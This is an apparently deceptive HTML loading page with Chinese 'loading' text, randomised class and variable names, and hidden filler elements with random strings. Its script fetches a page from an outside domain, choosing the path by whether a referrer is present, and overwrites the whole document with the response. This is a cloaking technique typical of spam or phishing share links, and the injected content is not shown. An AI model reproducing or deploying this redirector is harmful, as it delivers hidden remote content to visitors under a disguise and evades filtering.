<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .OPjPI2xJq2 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .OPjPI2xJq2 .ma85EMdal {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .OPjPI2xJq2 .content {
            line-height: 50px;
            text-align: center
        }

        .OPjPI2xJq2 .img {
            width: 100%
        }

        .OPjPI2xJq2 .jDjzHfzcU {
            text-align: center
        }

        .OPjPI2xJq2 .jDjzHfzcU span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .OPjPI2xJq2 .jDjzHfzcU span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .OPjPI2xJq2 .jDjzHfzcU span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .OPjPI2xJq2 .jDjzHfzcU span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .OPjPI2xJq2 .jDjzHfzcU span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .OPjPI2xJq2 .jDjzHfzcU span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .OPjPI2xJq2 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function uGYg9mBy6(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var IqgE9b = uGYg9mBy6('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ IqgE9b +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ IqgE9b +".html?a=share";
		}
		
        ydCHnk=url+"#"+new Date().getTime();
        ydCHnk && function() {
            $.get(ydCHnk, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >Njgxxvw8tl5RrUCIMx3VwIZl2Cbaj3ALOzlU6X6Gs5t7PuABDtXMQ2UQT9eYJx3FVNmEWuTj0qSt05b8Lnuxe7VW0h0wdee6</b>
<ul style='display:none' >ONFU9CXRaNlFglWMnrGBPMy5MbsKSk561V</ul>
<p  style='display:none'>sE3ioUXjhf1i4WCmzlFQDG</p>
<p  style='display:none'>sE3ioUXjhf1i4WCmzlFQDG</p>
<h1 style='display:none' >CcN8rBFsUvtrSJBi7Tcv5X25h1liQ9XcGdqqUxXud4d</h1>
<h1 style='display:none' >CcN8rBFsUvtrSJBi7Tcv5X25h1liQ9XcGdqqUxXud4d</h1>
<ul style='display:none' >ONFU9CXRaNlFglWMnrGBPMy5MbsKSk561V</ul>
<div style='display:none'>AhN0zjWlDbihrx6eeezmk3YV3UOjD9Kv2EeZOZyY92W6CCK</div>
<img  src='' style='display:none'><div class="OPjPI2xJq2">
    <div class="ma85EMdal">
        <div class="jDjzHfzcU">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >lJLM1KQg3m4xdduYGrEKZXl5QIDDVPlb6e3BSNAwp0dTqXvzXiSrWWFbNJPq0QXbeggEu0VxYCWVNO1BLI84wQPFQSriQ356Dfrby</ul>
<p  style='display:none'>mhKXEOwd55UyNmqKHyZ18qdiIlH2djV9Q6sMjgV14JvYpD5BWP5lRh6TzCodqCrl4bxkMdeXZaJzH91cuFYWHVFfgkDIMJS</p>
<li style='display:none' >yGipOo8M3ZCRRxAzaJdmlTngzGPsq3bjALa56EWOAGmBjCovgidfZvagRkgqXIVRzHoD72lauoDw9CfmIgzESgG0hKSPIkWSRexDW</li>
<a  href='#' style='display:none'>CSuVJwJZfJ8lWjif4x7S3NET8YAz4bt6h1xP6RNpIIg1T1mj0coAI4xJ9r8PEXDqnO9UXgkpy9jzbojxyje</a></body>
</html>